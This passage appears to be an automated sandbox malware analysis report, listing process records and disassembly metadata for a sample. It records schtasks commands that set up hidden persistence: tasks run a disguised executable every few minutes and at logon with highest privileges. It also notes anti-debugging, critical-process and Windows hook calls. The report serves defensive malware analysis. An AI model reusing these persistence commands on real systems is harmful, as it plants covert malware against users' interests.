                                                                                            Imagebase:0x7ff7ceb40000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:47
                                                                                            Start time:13:15:25
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:48
                                                                                            Start time:13:15:25
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP"
                                                                                            Imagebase:0x7ff7734f0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:49
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:50
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:51
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:52
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 11 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:53
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:54
                                                                                            Start time:13:15:28
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 7 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:55
                                                                                            Start time:13:15:28
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\agentwebreviewDhcp\WmiPrvSE.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:16.5%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:15%
                                                                                              Total number of Nodes:20
                                                                                              Total number of Limit Nodes:1
                                                                                              execution_graph 8075 7ffaac4777c1 8076 7ffaac4777df CheckRemoteDebuggerPresent 8075->8076 8078 7ffaac47787f 8076->8078 8095 7ffaac4787bd 8096 7ffaac4787c7 8095->8096 8097 7ffaac478785 8096->8097 8098 7ffaac479642 RtlSetProcessIsCritical 8096->8098 8099 7ffaac4796a2 8098->8099 8079 7ffaac478d2a 8080 7ffaac478d2f 8079->8080 8083 7ffaac478858 8080->8083 8084 7ffaac478807 RtlSetProcessIsCritical 8083->8084 8086 7ffaac478d48 8084->8086 8087 7ffaac479d78 8088 7ffaac479d81 SetWindowsHookExW 8087->8088 8090 7ffaac479e51 8088->8090 8091 7ffaac4794c8 8092 7ffaac4794d1 8091->8092 8092->8091 8093 7ffaac479642 RtlSetProcessIsCritical 8092->8093 8094 7ffaac4796a2 8093->8094

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC4720D1 Relevance: 5.4, Strings: 4, Instructions: 381COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$6$6$6
                                                                                              • API String ID: 0-3214027553
                                                                                              • Opcode ID: 53db1929273e946b7bdcd71d99f79ab48d132801fc73c5abec88f241d6f62888
                                                                                              • Instruction ID: 386d62625a140059a7d97b003b0ffbd0219d1c73a0b76e6446f0cf4902d6a14a
                                                                                              • Opcode Fuzzy Hash: 53db1929273e946b7bdcd71d99f79ab48d132801fc73c5abec88f241d6f62888
                                                                                              • Instruction Fuzzy Hash: 7DB1C4A0B1DA59CFFB98EB3C845967977D1FF99304F04817AD04EC3692DE28E8064785
                                                                                              Function 00007FFAAC47BAF8 Relevance: 2.4, Strings: 1, Instructions: 1166COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 704 7ffaac47baf8-7ffaac47e565 call 7ffaac470a68 712 7ffaac47e5db 704->712 713 7ffaac47e567-7ffaac47e584 704->713 715 7ffaac47e5e0-7ffaac47e5f5 712->715 713->715 716 7ffaac47e586-7ffaac47e5d6 call 7ffaac47da00 713->716 719 7ffaac47e5f7-7ffaac47e60e call 7ffaac471248 call 7ffaac470a78 715->719 720 7ffaac47e613-7ffaac47e628 715->720 739 7ffaac47f21b-7ffaac47f229 716->739 719->739 726 7ffaac47e65f-7ffaac47e674 720->726 727 7ffaac47e62a-7ffaac47e65a call 7ffaac471248 720->727 735 7ffaac47e687-7ffaac47e69c 726->735 736 7ffaac47e676-7ffaac47e682 call 7ffaac47bcd8 726->736 727->739 745 7ffaac47e69e-7ffaac47e6a1 735->745 746 7ffaac47e6e2-7ffaac47e6f7 735->746 736->739 745->712 747 7ffaac47e6a7-7ffaac47e6b2 745->747 751 7ffaac47e6f9-7ffaac47e6fc 746->751 752 7ffaac47e738-7ffaac47e74d 746->752 747->712 750 7ffaac47e6b8-7ffaac47e6dd call 7ffaac470a50 call 7ffaac47bcd8 747->750 750->739 751->712 754 7ffaac47e702-7ffaac47e70d 751->754 759 7ffaac47e74f-7ffaac47e752 752->759 760 7ffaac47e77a-7ffaac47e78f 752->760 754->712 757 7ffaac47e713-7ffaac47e72e call 7ffaac470a50 call 7ffaac47bb48 754->757 773 7ffaac47e733 757->773 759->712 762 7ffaac47e758-7ffaac47e775 call 7ffaac470a50 call 7ffaac47bb50 759->762 769 7ffaac47e867-7ffaac47e87c 760->769 770 7ffaac47e795-7ffaac47e7e1 call 7ffaac4709d8 760->770 762->739 777 7ffaac47e87e-7ffaac47e881 769->777 778 7ffaac47e89b-7ffaac47e8b0 769->778 770->712 803 7ffaac47e7e7-7ffaac47e816 770->803 773->739 777->712 781 7ffaac47e887-7ffaac47e896 call 7ffaac47bb28 777->781 787 7ffaac47e8d2-7ffaac47e8e7 778->787 788 7ffaac47e8b2-7ffaac47e8b5 778->788 781->739 794 7ffaac47e8e9-7ffaac47e902 787->794 795 7ffaac47e907-7ffaac47e91c 787->795 788->712 789 7ffaac47e8bb-7ffaac47e8cd call 7ffaac47bb28 788->789 789->739 794->739 800 7ffaac47e91e-7ffaac47e937 795->800 801 7ffaac47e93c-7ffaac47e951 795->801 800->739 806 7ffaac47e971-7ffaac47e986 801->806 807 7ffaac47e953-7ffaac47e96c 801->807 813 7ffaac47e9af-7ffaac47e9c4 806->813 814 7ffaac47e988-7ffaac47e98b 806->814 807->739 819 7ffaac47e9ca-7ffaac47ea42 813->819 820 7ffaac47ea64-7ffaac47ea79 813->820 814->712 815 7ffaac47e991-7ffaac47e9aa 814->815 815->739 819->712 843 7ffaac47ea48-7ffaac47ea5f 819->843 823 7ffaac47ea91-7ffaac47eaa6 820->823 824 7ffaac47ea7b-7ffaac47ea8c 820->824 830 7ffaac47eaac-7ffaac47eb24 823->830 831 7ffaac47eb46-7ffaac47eb5b 823->831 824->739 830->712 860 7ffaac47eb2a-7ffaac47eb41 830->860 836 7ffaac47eb5d-7ffaac47eb6e 831->836 837 7ffaac47eb73-7ffaac47eb88 831->837 836->739 845 7ffaac47ebba-7ffaac47ebcf 837->845 846 7ffaac47eb8a-7ffaac47ebb5 call 7ffaac470d60 call 7ffaac47da00 837->846 843->739 852 7ffaac47ecac-7ffaac47ecc1 845->852 853 7ffaac47ebd5-7ffaac47eca7 call 7ffaac470d60 call 7ffaac47da00 845->853 846->739 862 7ffaac47ed88-7ffaac47ed9d 852->862 863 7ffaac47ecc7-7ffaac47ecca 852->863 853->739 860->739 872 7ffaac47edb1-7ffaac47edc6 862->872 873 7ffaac47ed9f-7ffaac47edac call 7ffaac47da00 862->873 864 7ffaac47ecd0-7ffaac47ecdb 863->864 865 7ffaac47ed7d-7ffaac47ed82 863->865 864->865 869 7ffaac47ece1-7ffaac47ed7b call 7ffaac470d60 call 7ffaac47da00 864->869 874 7ffaac47ed83 865->874 869->874 882 7ffaac47ee3d-7ffaac47ee52 872->882 883 7ffaac47edc8-7ffaac47edd9 872->883 873->739 874->739 890 7ffaac47ee54-7ffaac47ee57 882->890 891 7ffaac47ee92-7ffaac47eea7 882->891 883->712 888 7ffaac47eddf-7ffaac47edef call 7ffaac470a48 883->888 901 7ffaac47edf1-7ffaac47ee16 call 7ffaac47da00 888->901 902 7ffaac47ee1b-7ffaac47ee38 call 7ffaac470a48 call 7ffaac470a50 call 7ffaac47bb00 888->902 890->712 894 7ffaac47ee5d-7ffaac47ee8d call 7ffaac470a40 call 7ffaac470a50 call 7ffaac47bb00 890->894 899 7ffaac47eeed-7ffaac47ef02 891->899 900 7ffaac47eea9-7ffaac47eee8 call 7ffaac478c90 call 7ffaac47aaf8 call 7ffaac47bb08 891->900 894->739 919 7ffaac47ef08-7ffaac47ef9d call 7ffaac470d60 call 7ffaac47da00 899->919 920 7ffaac47efa2-7ffaac47efb7 899->920 900->739 901->739 902->739 919->739 920->739 933 7ffaac47efbd-7ffaac47efc4 920->933 939 7ffaac47efd7-7ffaac47f0f1 call 7ffaac47bd28 call 7ffaac47bd38 call 7ffaac47bd48 call 7ffaac47bd58 call 7ffaac47aa98 call 7ffaac47bd68 call 7ffaac47bd38 call 7ffaac47bd48 933->939 940 7ffaac47efc6-7ffaac47efd0 call 7ffaac47bd18 933->940 988 7ffaac47f0f3-7ffaac47f0f7 939->988 989 7ffaac47f162-7ffaac47f171 939->989 940->939 990 7ffaac47f0f9-7ffaac47f158 call 7ffaac47bd78 call 7ffaac47bd88 988->990 991 7ffaac47f178-7ffaac47f21a call 7ffaac470d60 call 7ffaac470a58 call 7ffaac47da00 988->991 989->991 990->989 991->739
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 42ac605a694be864182050dcd17a4951d04bb86e2f3c2f5a65a7978824af48af
                                                                                              • Instruction ID: 7107babb632557dc90b2b9bc9b7e3709a6161a96b8f0883a4413e6589e2e0bbc
                                                                                              • Opcode Fuzzy Hash: 42ac605a694be864182050dcd17a4951d04bb86e2f3c2f5a65a7978824af48af
                                                                                              • Instruction Fuzzy Hash: 53829470B5D91A8FFB94EB78C49AA7972D2FF99304F508578D01EC32C2DD28E8468785
                                                                                              Function 00007FFAAC4777C1 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                              • String ID:
                                                                                              • API String ID: 3662101638-0
                                                                                              • Opcode ID: e0a02923e5382c8df93c76814c0ddb7ae836b63de67037baad3a780184ef1bb2
                                                                                              • Instruction ID: 4c76b8734686ff791afe1c7f5c5c0ac0a7eace20810a6e95bf02e34454fd6aef
                                                                                              • Opcode Fuzzy Hash: e0a02923e5382c8df93c76814c0ddb7ae836b63de67037baad3a780184ef1bb2
                                                                                              • Instruction Fuzzy Hash: 7331237190871C8FDB58DF58C84ABE97BE0FF65321F04426BD48AD7252DB34A846CB91
                                                                                              Function 00007FFAAC471E4E Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 090a5b40b9a3ba7b4612283adeae41b8612054942b5a3b47ae5b61ba84764261
                                                                                              • Instruction ID: b30add26bc90768a30d574efef1016c9edaa5df26bdac4607c3aaab1666402ed
                                                                                              • Opcode Fuzzy Hash: 090a5b40b9a3ba7b4612283adeae41b8612054942b5a3b47ae5b61ba84764261
                                                                                              • Instruction Fuzzy Hash: DC51C05160E7C50FE78697B898696657FE6DF8B220B0941FFE08DCB1A3DD588C0AC352
                                                                                              Function 00007FFAAC475E06 Relevance: .5, Instructions: 471COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5cf419e89cff9442d8e51dfe9fa6c625f59c9c7398d48a131c7cba21dfa16d0
                                                                                              • Instruction ID: 5f6cd22337f9a5265a0f2cd2ca362a1222378719411a10eea3584e56e1d74ae7
                                                                                              • Opcode Fuzzy Hash: f5cf419e89cff9442d8e51dfe9fa6c625f59c9c7398d48a131c7cba21dfa16d0
                                                                                              • Instruction Fuzzy Hash: 45F19330908A8D8FFBA8DF28D8597E937E1FF55310F04826EE84DC7291CB3499458B81
                                                                                              Function 00007FFAAC476BB2 Relevance: .5, Instructions: 455COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6bbb1224f9a87983c88a1fd8fd70d5564eed497f7ebe61b94698d8246eb9ee4e
                                                                                              • Instruction ID: e271a0c7808299206b080e6c574b1cdef10f80dbb3b46ccb2a68fb0a460441eb
                                                                                              • Opcode Fuzzy Hash: 6bbb1224f9a87983c88a1fd8fd70d5564eed497f7ebe61b94698d8246eb9ee4e
                                                                                              • Instruction Fuzzy Hash: 0DE1A330918A4E8FFBA8DF28C85A7E977D2FB55310F04826ED84DC7291DB74A9458BC1
                                                                                              Function 00007FFAAC4787BD Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 306COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M_^$M_^
                                                                                              • API String ID: 0-615062493
                                                                                              • Opcode ID: f4558c89c711a3b1ec7c1f588076b8e1d8c43b87ed0317eeccd650ee680501a2
                                                                                              • Instruction ID: e9cfb5f485d4df90e6336a8a31c01246403722e0fede9ef7cf6e810d1d29e45b
                                                                                              • Opcode Fuzzy Hash: f4558c89c711a3b1ec7c1f588076b8e1d8c43b87ed0317eeccd650ee680501a2
                                                                                              • Instruction Fuzzy Hash: DFA102B2C0E6D6CFF35587689C5E2B57FD0FF12314B1881BED08D97183E929980A8796
                                                                                              Function 00007FFAAC478858 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M_^$M_^
                                                                                              • API String ID: 0-615062493
                                                                                              • Opcode ID: b893407658bfdbfd40669dbfed24a5a4a12bf9d553bde6c51c40bfb0642aa386
                                                                                              • Instruction ID: 1343dfdb9d9ab9da2ad3cfdeb5009dfff0edb6d5de58b1a67d6c3c5d83e20cea
                                                                                              • Opcode Fuzzy Hash: b893407658bfdbfd40669dbfed24a5a4a12bf9d553bde6c51c40bfb0642aa386
                                                                                              • Instruction Fuzzy Hash: C46137B180E795CFF719CB68885D6B9BFE0EF52214F0881BED08D97583E924990987D2
                                                                                              Function 00007FFAAC4794C8 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1017 7ffaac4794c8-7ffaac4794e2 1020 7ffaac4794ea-7ffaac4794fa 1017->1020 1021 7ffaac4794e4-7ffaac4794e9 1017->1021 1024 7ffaac4794fc 1020->1024 1025 7ffaac479527-7ffaac479530 1020->1025 1021->1020 1028 7ffaac4794fe-7ffaac479501 1024->1028 1029 7ffaac479504-7ffaac479512 1024->1029 1026 7ffaac479572-7ffaac47963a 1025->1026 1027 7ffaac479532 1025->1027 1052 7ffaac479642-7ffaac4796a0 RtlSetProcessIsCritical 1026->1052 1033 7ffaac47953a-7ffaac479571 1027->1033 1034 7ffaac479534-7ffaac479537 1027->1034 1028->1029 1031 7ffaac47951a-7ffaac479525 1029->1031 1032 7ffaac479514-7ffaac479519 1029->1032 1031->1025 1032->1017 1032->1031 1033->1026 1034->1033 1053 7ffaac4796a8-7ffaac4796dd 1052->1053 1054 7ffaac4796a2 1052->1054 1054->1053
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2695349919-0
                                                                                              • Opcode ID: 66a5548548730f688201034e821c1b1bebd047d012787e1c17c6c7ed57c281ea
                                                                                              • Instruction ID: 33f8ef33f85f8b5120aab7493f420b0a9b69f1fc244dfb6b6a3a465c87d1dbec
                                                                                              • Opcode Fuzzy Hash: 66a5548548730f688201034e821c1b1bebd047d012787e1c17c6c7ed57c281ea
                                                                                              • Instruction Fuzzy Hash: 3E81257290E7E58FF315CBA898595B97FE0EF63324F08807AD0CD87193D929A8098395
                                                                                              Function 00007FFAAC479D78 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: 2066c1859cbe0bdfd2f1e3670fc9471a565737364cab3bb96c277df22a6c10ae
                                                                                              • Instruction ID: 65f516f056a985a82d54dfc6931445847c11620d51e1e34200bb9f67aeb404c1
                                                                                              • Opcode Fuzzy Hash: 2066c1859cbe0bdfd2f1e3670fc9471a565737364cab3bb96c277df22a6c10ae
                                                                                              • Instruction Fuzzy Hash: 9241077090CA598FEB58DB6CD84A6F9BBE1EB59321F00423ED00DC3292DE74A856C7C1

                                                                                              Non-executed Functions

                                                                                              Function 00007FFAAC4809E1 Relevance: 27.3, Strings: 21, Instructions: 1017COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6
                                                                                              • API String ID: 0-3953544715
                                                                                              • Opcode ID: a4a38a5987359cfd47d697d0354c9e14dca7e01733c145f8dc4ed273a4558af6
                                                                                              • Instruction ID: 5b4d7554b0cc14c06790a35b82019543050953cb3e6a220ef017525fd0f840e3
                                                                                              • Opcode Fuzzy Hash: a4a38a5987359cfd47d697d0354c9e14dca7e01733c145f8dc4ed273a4558af6
                                                                                              • Instruction Fuzzy Hash: 4262D670B6CA058BF794EB38C45E679B7D2FF99704F50857AD40EC3292DE28E8458782
                                                                                              Function 00007FFAAC4833D1 Relevance: .6, Instructions: 647COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6af57443afc79caf2228579eb3dc9e77c9c6e7eeb76b28cf4d86a6f39e5cf2aa
                                                                                              • Instruction ID: 50e10a07c8e629879875ec114bc63c080dcc17a396ae56146a692b7262a34a42
                                                                                              • Opcode Fuzzy Hash: 6af57443afc79caf2228579eb3dc9e77c9c6e7eeb76b28cf4d86a6f39e5cf2aa
                                                                                              • Instruction Fuzzy Hash: 57424B70D09519CFEB64EB28C499BF9B7B1FF49304F1085B9D01EA3292CE35AA85CB44

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC52660A Relevance: .5, Instructions: 452COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1384037143.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac520000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9be0b4d371e3832d58bc1db2e1f3b02bd4464ec513bdc4c15c2288e19a98f25a
                                                                                              • Instruction ID: 4bff0600a4ce4e093b3667f73125f48bfb050cadc99f61bf133b064b80a81ded
                                                                                              • Opcode Fuzzy Hash: 9be0b4d371e3832d58bc1db2e1f3b02bd4464ec513bdc4c15c2288e19a98f25a
                                                                                              • Instruction Fuzzy Hash: B3D168B694EB8A8FF7559B6898159B57BE4EF66310B0841BEE04DC70D3ED18EC098381
                                                                                              Function 00007FFAAC4594FA Relevance: .4, Instructions: 373COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1383664303.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b92b393cd74779cad86e70c5b8ae6a5a33b0e0ed7aad718eb89a647f52f8e21
                                                                                              • Instruction ID: 9c53213cdfbe7ce8ade95d5b844d13bf276df4609ad6ed4a0d8f0989f3012387
                                                                                              • Opcode Fuzzy Hash: 6b92b393cd74779cad86e70c5b8ae6a5a33b0e0ed7aad718eb89a647f52f8e21
                                                                                              • Instruction Fuzzy Hash: 17C1FC6390EBCA8FF31597289C5D1A97FA0FF63224F0C41BFC08947193E919A81A87D5
                                                                                              Function 00007FFAAC459F82 Relevance: .2, Instructions: 164COMMON
